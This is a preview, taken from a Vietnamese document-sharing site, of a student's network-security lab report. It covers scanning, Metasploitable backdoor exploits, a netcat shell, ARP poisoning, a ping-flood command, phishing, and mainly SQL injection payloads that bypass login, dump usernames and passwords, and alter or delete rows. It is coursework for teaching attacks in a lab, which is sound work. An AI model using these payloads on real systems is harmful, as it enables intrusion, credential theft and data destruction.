1. Trang chủ
  2. » Tất cả

Báo cáo thực hành an toàn mạng bài thực hành số 2

42 4 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Báo cáo thực hành an toàn mạng bài thực hành số 2
Người hướng dẫn TS. Đặng Minh Tuấn
Trường học Học Viện Công Nghệ Bưu Chính Viễn Thông
Thể loại Báo cáo thực hành
Định dạng
Số trang 42
Dung lượng 4,18 MB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

- Cấu hình file scan trong Nessus - Kết quả scan máy victim bằng Nessus... - Kiểm tra xem đã thâm nhập vào máy victim hay chưa • Kết quả lệnh ifconfig trùng với ip của máy victim... o Ph

Trang 1

HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG

BÁO CÁO THỰC HÀNH

AN TOÀN MẠNG BÀI THỰC HÀNH SỐ 2

Giảng viên hướng dẫn: TS Đặng Minh Tuấn

Trang 2

MỤC LỤC

BÀI 1: FOOTPRINT 1

BÀI 2: SCANNING 7

BÀI 3: SYSTEM HACKING 21

BÀI 4: TROJAN VÀ BACKDOOR 23

BÀI 5: CÁC PHƯƠNG PHÁP SNIFFER 24

BÀI 6: TẤN CÔNG TỪ CHỐI DỊCH VỤ DOS 25

BÀI 7: SOCIAL ENGINEERING 25

BÀI 8: HACKING WEB SERVER 27

BÀI 9: WEB APPLICATION HACKING 28

BÀI 10: SQL INJECTION 29

BÀI 11: BUFFER OVERFLOW 39

BÀI 1: FOOTPRINT

I Tìm thông tin về domain

- Tìm kiếm thông tin về domain itvietnam.com sử dụng trang web

https://who.is/

Trang 4

- Tra cứu thông tin domain google.com sử dụng trang web

https://whois.domaintools.com/

Trang 7

II Tìm thông tin email

http://www.123hiddensender.com)

- Keyword: vnn.vn

Trang 8

BÀI 2: SCANNING

I Sử dụng phần mềm nmap

- Lấy thông tin từ máy từ xa và xác định hệ điều hành của máy

• nmap -sS -P0 -sV -O <target>

Trang 10

Lấy danh sách các máy chủ với các cổng mở được định nghĩa trước

• nmap -p 135 -oG – 192.168.1.5

• nmap -p 445 -oG – 192.168.1.5

Trang 14

-

- Cấu hình mạng máy Kali Linux

Trang 15

-

Lệnh ping từ Kali Linux sang máy victim

- Lệnh ping từ máy victim sang Kali Linux

Trang 16

-

Cấu hình file scan trong Nessus

- Kết quả scan máy victim bằng Nessus

Trang 17

-

Trang 18

 Khai thác backdoor unrealIRCd (port 6667)

UnrealIRCd là máy chủ nhắn tin hoạt động dựa trên giao thức IRC trên cổng TCP 6667

UnrealIRCd tồn tại một cửa hậu sau một thời gian dài không mới bị phát hiện Cửa hậu mở ra khi nhận được chuỗi ký tự “AB” kèm theo 1 lệnh shell hệ

- Bắt đầu khai thác

Trang 19

- Kiểm tra xem đã thâm nhập vào máy victim hay chưa

• Kết quả lệnh ifconfig trùng với ip của máy victim

Trang 21

• Kiểm tra hostname

Trang 22

1

BÀI 3: SYSTEM HACKING

Trang 23

1

Dùng Cain để brute-force mật khẩu

Trang 24

1

BÀI 4: TROJAN VÀ BACKDOOR

Sử dụng netcat để kết nối shell

Trang 25

1

BÀI 5: CÁC PHƯƠNG PHÁP SNIFFER

Sử dụng Etercap để tấn công ARP Poisoning

Trang 26

1

BÀI 6: TẤN CÔNG TỪ CHỐI DỊCH VỤ DOS

Dùng lệnh "For /L %i in (1,1,100) do start ping [ip victim] -l 10000 -t" trên cmd

BÀI 7: SOCIAL ENGINEERING Gửi tin bằng email giả mạo có đính kèm link chứa mã độc

Trang 27

1

Trang 28

BÀI 8: HACKING WEB SERVER

- Cấu hình mạng máy victim (Metasploitable2)

- Cấu hình mạng máy Kali Linux

- Khai thác backdoor Vsftpd v2.3.4 (port 6200)

Trang 29

BÀI 9: WEB APPLICATION HACKING

1 XSS Stored

Trang 30

BÀI 10: SQL INJECTION

1 Vượt qua khâu xác thực người dùng

- Chi tiết file login_error.txt

Trang 31

- Nhập dữ liệu cho phép đăng nhập mà không cần có đủ username và

password:

Trang 32

o Phân tích câu lệnh SQL được thực hiện (hiển thị trên trang) và giải thích kết quả có

được

 Câu lệnh 1 sẽ lấy bản ghi đầu tiên trong bảng tbl_users với username = ‘aaaa’ or 1=1 –’ và password = ‘today’ Kết quả đăng nhập thành công với tài khoản người dùng đầu tiên trong danh sách

Trang 33

 Câu lệnh 2 sẽ lấy bản ghi đầu tiên trong bảng tbl_users với username = ‘david –’ và password = ‘today’ Kết quả đăng nhập

sẽ thành công với tài khoản người dùng david nếu tồn tại tài khoản với user này

2 Trích xuất dữ liệu từ CSDL

- Chi tiết file search_error.txt

Trang 34

o sam%’ union select <danh sách trường thử>;

- Hiển thị thông tin hệ quản trị CSDL và hệ điều hành o ssss' union select '',

@@version, 0

Trang 35

- Trích xuất danh sách các bảng của CSDL o ssss' union select '', name, 0

from sys.objects where type='u';

- Trích xuất danh sách các trường của một bảng o ssss' union select '',

a.name, 0 from sys.columns a inner join sys.objects b on a.object_id =

b.object_id where b.name='tbl_users';

Trang 36

o Thay tên bảng tbl_users bằng bảng khác có được ở mục trên để hiển thị danh sách

các trường của bảng đó

Trang 37

- Trích xuất dữ liệu bảng o ssss' union select full_name,

username+' '+password, 0 from tbl_users;

Trang 38

o Thay tên bảng và danh sách trường để trích xuất dữ liệu của các bảng khác có được ở mục trên

viên trùng với mã sv của mình và hiển thị toàn bộ thông tin trích xuất được lên màn hình

Trang 39

3 Thêm, sửa, xoá dữ liệu

- samsung'; update tbl_users set password='lostmypassword' where

username='david';

- samsung'; insert into tbl_users (full_name, username, password) values

('GiantB', 'giant_bee', 'conongratto');

Trang 40

- samsung'; delete from tbl_users where username = 'giant_bee';

BÀI 11: BUFFER OVERFLOW

Ngày đăng: 26/02/2023, 17:23

TỪ KHÓA LIÊN QUAN

🧩 Sản phẩm bạn có thể quan tâm

w